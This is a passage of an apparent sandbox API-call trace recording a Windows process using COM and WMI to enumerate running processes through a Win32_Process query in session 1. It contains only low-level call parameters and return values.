CloseHandle (hObject=0x364) returned 1 [0222.789] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3940150, Length=0x20000, ResultLength=0x36f210 | out: SystemInformation=0x3940150, ResultLength=0x36f210*=0xc870) returned 0x0 [0222.802] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1fc | out: puCount=0x36f1fc*=0x2) returned 0x0 [0222.802] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1f8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1f8*=0xf, pszText=0x0) returned 0x0 [0222.802] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1f8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1f8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0222.802] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f184 | out: ppv=0x36f184*=0x6ee4bc) returned 0x0 [0222.802] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f17c | out: pAptType=0x36f17c*=1) returned 0x0 [0222.802] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f180 | out: ppvObject=0x36f180*=0x0) returned 0x80004002 [0222.802] IUnknown:Release (This=0x6ee4bc) returned 0x0 [0222.803] CoGetClassObject (in: rclsid=0x761b14*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eda0 | out: ppv=0x36eda0*=0x5e8de80) returned 0x0 [0222.803] WbemLocator:IUnknown:QueryInterface (in: This=0x5e8de80, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36efb8 | out: ppvObject=0x36efb8*=0x0) returned 0x80004002 [0222.803] WbemLocator:IClassFactory:CreateInstance (in: This=0x5e8de80, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36efc4 | out: ppvObject=0x36efc4*=0x769448) returned 0x0 [0222.803] WbemLocator:IUnknown:Release (This=0x5e8de80) returned 0x0 [0222.803] WbemLocator:IUnknown:QueryInterface (in: This=0x769448, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ebe4 | out: ppvObject=0x36ebe4*=0x769448) returned 0x0 [0222.803] WbemLocator:IUnknown:QueryInterface (in: This=0x769448, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36eb98 | out: ppvObject=0x36eb98*=0x0) returned 0x80004002 [0222.804] WbemLocator:IUnknown:AddRef (This=0x769448) returned 0x3 [0222.804] WbemLocator:IUnknown:QueryInterface (in: This=0x769448, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e4f4 | out: ppvObject=0x36e4f4*=0x0) returned 0x80004002 [0222.804] WbemLocator:IUnknown:QueryInterface (in: This=0x769448, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e4a4 | out: ppvObject=0x36e4a4*=0x0) returned 0x80004002 [0222.804] WbemLocator:IUnknown:QueryInterface (in: This=0x769448, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e4b0 | out: ppvObject=0x36e4b0*=0x0) returned 0x80004002 [0222.804] CoGetContextToken (in: pToken=0x36e510 | out: pToken=0x36e510) returned 0x0 [0222.804] CoGetObjectContext (in: riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5e8de84 | out: ppv=0x5e8de84*=0x6ee4b0) returned 0x0 [0222.804] CoGetContextToken (in: pToken=0x36e924 | out: pToken=0x36e924) returned 0x0 [0222.804] WbemLocator:IUnknown:QueryInterface (in: This=0x769448, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e9a4 | out: ppvObject=0x36e9a4*=0x0) returned 0x80004002 [0222.804] WbemLocator:IUnknown:Release (This=0x769448) returned 0x2 [0222.804] WbemLocator:IUnknown:Release (This=0x769448) returned 0x1 [0222.804] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0222.804] CoGetContextToken (in: pToken=0x36ef04 | out: pToken=0x36ef04) returned 0x0 [0222.804] WbemLocator:IUnknown:QueryInterface (in: This=0x769448, riid=0x36efd4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36efd0 | out: ppvObject=0x36efd0*=0x769448) returned 0x0 [0222.804] WbemLocator:IUnknown:AddRef (This=0x769448) returned 0x3 [0222.804] WbemLocator:IUnknown:Release (This=0x769448) returned 0x2 [0222.804] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f160 | out: puCount=0x36f160*=0x2) returned 0x0 [0222.804] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=8, puBuffLength=0x36f15c*=0x0, pszText=0x0 | out: puBuffLength=0x36f15c*=0xf, pszText=0x0) returned 0x0 [0222.804] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=8, puBuffLength=0x36f15c*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f15c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0222.804] CoCreateInstance (in: rclsid=0x727c3734*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x727c3794*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x36f00c | out: ppv=0x36f00c*=0x7694d8) returned 0x0 [0222.805] WbemLocator:IWbemLocator:ConnectServer (in: This=0x7694d8, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x36f0ac | out: ppNamespace=0x36f0ac*=0x793148) returned 0x0 [0222.878] WbemLocator:IUnknown:QueryInterface (in: This=0x793148, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ef30 | out: ppvObject=0x36ef30*=0x784d04) returned 0x0 [0222.878] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x784d04, pProxy=0x793148, pAuthnSvc=0x36ef80, pAuthzSvc=0x36ef7c, pServerPrincName=0x36ef74, pAuthnLevel=0x36ef78, pImpLevel=0x36ef68, pAuthInfo=0x36ef6c, pCapabilites=0x36ef70 | out: pAuthnSvc=0x36ef80*=0xa, pAuthzSvc=0x36ef7c*=0x0, pServerPrincName=0x36ef74, pAuthnLevel=0x36ef78*=0x6, pImpLevel=0x36ef68*=0x2, pAuthInfo=0x36ef6c, pCapabilites=0x36ef70*=0x1) returned 0x0 [0222.878] WbemLocator:IUnknown:Release (This=0x784d04) returned 0x1 [0222.878] WbemLocator:IUnknown:QueryInterface (in: This=0x793148, riid=0x727c35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ef24 | out: ppvObject=0x36ef24*=0x784d24) returned 0x0 [0222.878] WbemLocator:IUnknown:QueryInterface (in: This=0x793148, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ef10 | out: ppvObject=0x36ef10*=0x784d04) returned 0x0 [0222.878] WbemLocator:IClientSecurity:SetBlanket (This=0x784d04, pProxy=0x793148, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0222.879] WbemLocator:IUnknown:Release (This=0x784d04) returned 0x2 [0222.879] WbemLocator:IUnknown:Release (This=0x784d24) returned 0x1 [0222.879] CoTaskMemFree (pv=0x793e88) [0222.879] WbemLocator:IUnknown:AddRef (This=0x793148) returned 0x2 [0222.879] WbemLocator:IUnknown:Release (This=0x7694d8) returned 0x0 [0222.879] CoGetContextToken (in: pToken=0x36e464 | out: pToken=0x36e464) returned 0x0 [0222.879] CoGetContextToken (in: pToken=0x36e874 | out: pToken=0x36e874) returned 0x0 [0222.879] WbemLocator:IUnknown:QueryInterface (in: This=0x793148, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e810 | out: ppvObject=0x36e810*=0x784d0c) returned 0x0 [0222.880] WbemLocator:IRpcOptions:Query (in: This=0x784d0c, pPrx=0x5e8de98, dwProperty=2, pdwValue=0x36e904 | out: pdwValue=0x36e904) returned 0x80004002 [0222.880] WbemLocator:IUnknown:Release (This=0x784d0c) returned 0x2 [0222.880] CoGetContextToken (in: pToken=0x36ee44 | out: pToken=0x36ee44) returned 0x0 [0222.880] CoGetContextToken (in: pToken=0x36eda4 | out: pToken=0x36eda4) returned 0x0 [0222.880] WbemLocator:IUnknown:QueryInterface (in: This=0x793148, riid=0x36ee74*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x36ed40 | out: ppvObject=0x36ed40*=0x793148) returned 0x0 [0222.880] WbemLocator:IUnknown:Release (This=0x793148) returned 0x2 [0222.880] SysStringLen (param_1=0x0) returned 0x0 [0222.880] CoGetContextToken (in: pToken=0x36ef44 | out: pToken=0x36ef44) returned 0x0 [0222.880] IWbemServices:ExecQuery (in: This=0x793148, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Process Where SessionId='1'", lFlags=16, pCtx=0x0, ppEnum=0x36f16c | out: ppEnum=0x36f16c*=0x70f928) returned 0x0 [0222.893] IUnknown:QueryInterface (in: This=0x70f928, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36efa4 | out: ppvObject=0x36efa4*=0x70f92c) returned 0x0 [0222.893] IClientSecurity:QueryBlanket (in: This=0x70f92c, pProxy=0x70f928, pAuthnSvc=0x36eff4, pAuthzSvc=0x36eff0, pServerPrincName=0x36efe8, pAuthnLevel=0x36efec, pImpLevel=0x36efdc, pAuthInfo=0x36efe0, pCapabilites=0x36efe4 | out: pAuthnSvc=0x36eff4*=0xa, pAuthzSvc=0x36eff0*=0x0, pServerPrincName=0x36efe8, pAuthnLevel=0x36efec*=0x6, pImpLevel=0x36efdc*=0x2, pAuthInfo=0x36efe0, pCapabilites=0x36efe4*=0x1) returned 0x0 [0222.893] IUnknown:Release (This=0x70f92c) returned 0x1 [0222.893] IUnknown:QueryInterface (in: This=0x70f928, riid=0x727c35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ef98 | out: ppvObject=0x36ef98*=0x7851d4) returned 0x0 [0222.893] IUnknown:QueryInterface (in: This=0x70f928, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ef84 | out: ppvObject=0x36ef84*=0x70f92c) returned 0x0 [0222.893] IClientSecurity:SetBlanket (This=0x70f92c, pProxy=0x70f928, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0222.895] IUnknown:Release (This=0x70f92c) returned 0x2 [0222.895] WbemLocator:IUnknown:Release (This=0x7851d4) returned 0x1 [0222.895] CoTaskMemFree (pv=0x793e28) [0222.895] IUnknown:AddRef (This=0x70f928) returned 0x2 [0222.896] CoGetContextToken (in: pToken=0x36e4c4 | out: pToken=0x36e4c4) returned 0x0 [0222.896] CoGetContextToken (in: pToken=0x36e8d4 | out: pToken=0x36e8d4) returned 0x0 [0222.896] IUnknown:QueryInterface (in: This=0x70f928, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e870 | out: ppvObject=0x36e870*=0x7851bc) returned 0x0 [0222.896] WbemLocator:IRpcOptions:Query (in: This=0x7851bc, pPrx=0x5e8dc88, dwProperty=2, pdwValue=0x36e964 | out: pdwValue=0x36e964) returned 0x80004002 [0222.896] WbemLocator:IUnknown:Release (This=0x7851bc) returned 0x2 [0222.897] CoGetContextToken (in: pToken=0x36eea4 | out: pToken=0x36eea4) returned 0x0 [0222.897] CoGetContextToken (in: pToken=0x36ee04 | out: pToken=0x36ee04) returned 0x0 [0222.897] IUnknown:QueryInterface (in: This=0x70f928, riid=0x36eed4*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x36eda0 | out: ppvObject=0x36eda0*=0x70f928) returned 0x0 [0222.897] IUnknown:Release (This=0x70f928) returned 0x2 [0222.897] SysStringLen (param_1=0x0) returned 0x0 [0222.897] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1b8 | out: puCount=0x36f1b8*=0x2) returned 0x0 [0222.897] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b4*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b4*=0xf, pszText=0x0) returned 0x0 [0222.897] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b4*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0222.897] CoGetContextToken (in: pToken=0x36f00c | out: pToken=0x36f00c) returned 0x0 [0222.898] IEnumWbemClassObject:Clone (in: This=0x70f928, ppEnum=0x36f1c4 | out: ppEnum=0x36f1c4*=0x70f9f0) returned 0x0 [0222.899] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f080 | out: ppvObject=0x36f080*=0x70f9f4) returned 0x0 [0222.899] IClientSecurity:QueryBlanket (in: This=0x70f9f4, pProxy=0x70f9f0, pAuthnSvc=0x36f0d0, pAuthzSvc=0x36f0cc, pServerPrincName=0x36f0c4, pAuthnLevel=0x36f0c8, pImpLevel=0x36f0b8, pAuthInfo=0x36f0bc, pCapabilites=0x36f0c0 | out: pAuthnSvc=0x36f0d0*=0xa, pAuthzSvc=0x36f0cc*=0x0, pServerPrincName=0x36f0c4, pAuthnLevel=0x36f0c8*=0x6, pImpLevel=0x36f0b8*=0x2, pAuthInfo=0x36f0bc, pCapabilites=0x36f0c0*=0x1) returned 0x0 [0222.899] IUnknown:Release (This=0x70f9f4) returned 0x1 [0222.899] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x727c35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f074 | out: ppvObject=0x36f074*=0x784c34) returned 0x0 [0222.899] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f060 | out: ppvObject=0x36f060*=0x70f9f4) returned 0x0 [0222.899] IClientSecurity:SetBlanket (This=0x70f9f4, pProxy=0x70f9f0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0222.901] IUnknown:Release (This=0x70f9f4) returned 0x2 [0222.901] WbemLocator:IUnknown:Release (This=0x784c34) returned 0x1 [0222.901] CoTaskMemFree (pv=0x793f48) [0222.901] IUnknown:AddRef (This=0x70f9f0) returned 0x2 [0222.902] CoGetContextToken (in: pToken=0x36e590 | out: pToken=0x36e590) returned 0x0 [0222.902] CoGetContextToken (in: pToken=0x36e9a4 | out: pToken=0x36e9a4) returned 0x0 [0222.902] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e93c | out: ppvObject=0x36e93c*=0x784c1c) returned 0x0 [0222.902] WbemLocator:IRpcOptions:Query (in: This=0x784c1c, pPrx=0x5e8de38, dwProperty=2, pdwValue=0x36ea30 | out: pdwValue=0x36ea30) returned 0x80004002 [0222.902] WbemLocator:IUnknown:Release (This=0x784c1c) returned 0x2 [0222.902] CoGetContextToken (in: pToken=0x36ef74 | out: pToken=0x36ef74) returned 0x0 [0222.902] CoGetContextToken (in: pToken=0x36eed4 | out: pToken=0x36eed4) returned 0x0 [0222.902] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x36efa4*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x36ee70 | out: ppvObject=0x36ee70*=0x70f9f0) returned 0x0 [0222.902] IUnknown:Release (This=0x70f9f0) returned 0x2 [0222.903] SysStringLen (param_1=0x0) returned 0x0 [0222.903] IEnumWbemClassObject:Reset (This=0x70f9f0) returned 0x0 [0222.903] CoTaskMemAlloc (cb=0x4) returned 0x7693e8 [0222.904] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x7693e8, puReturned=0x26dde18 | out: apObjects=0x7693e8*=0x5e8d550, puReturned=0x26dde18*=0x1) returned 0x0 [0223.671] IUnknown:QueryInterface (in: This=0x5e8d550, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5e8d550) returned 0x0 [0223.671] IUnknown:QueryInterface (in: This=0x5e8d550, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0223.671] IUnknown:QueryInterface (in: This=0x5e8d550, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0223.672] IUnknown:AddRef (This=0x5e8d550) returned 0x3 [0223.672] IUnknown:QueryInterface (in: This=0x5e8d550, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0223.672] IUnknown:QueryInterface (in: This=0x5e8d550, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0223.672] IUnknown:QueryInterface (in: This=0x5e8d550, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5e8d554) returned 0x0 [0223.672] IMarshal:GetUnmarshalClass (in: This=0x5e8d554, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0223.672] IUnknown:Release (This=0x5e8d554) returned 0x3 [0223.672] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0223.672] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0223.672] IUnknown:QueryInterface (in: This=0x5e8d550, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0223.672] IUnknown:Release (This=0x5e8d550) returned 0x2 [0223.672] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0223.672] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0223.672] IUnknown:QueryInterface (in: This=0x5e8d550, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5e8d550) returned 0x0 [0223.673] IUnknown:AddRef (This=0x5e8d550) returned 0x4 [0223.673] IUnknown:Release (This=0x5e8d550) returned 0x3 [0223.673] IUnknown:Release (This=0x5e8d550) returned 0x2 [0223.673] CoTaskMemFree (pv=0x7693e8) [0223.673] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0223.673] IUnknown:AddRef (This=0x5e8d550) returned 0x3 [0223.673] IWbemClassObject:Get (in: This=0x5e8d550, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0223.674] IWbemClassObject:Get (in: This=0x5e8d550, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"380\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0223.674] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"380\"") returned 0x64 [0223.674] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"380\"") returned 0x64 [0223.674] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0223.674] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0223.674] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0223.674] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0223.676] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x7693e8) returned 0x0 [0223.676] WbemDefPath:IUnknown:QueryInterface (in: This=0x7693e8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0223.676] WbemDefPath:IClassFactory:CreateInstance (in: This=0x7693e8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | 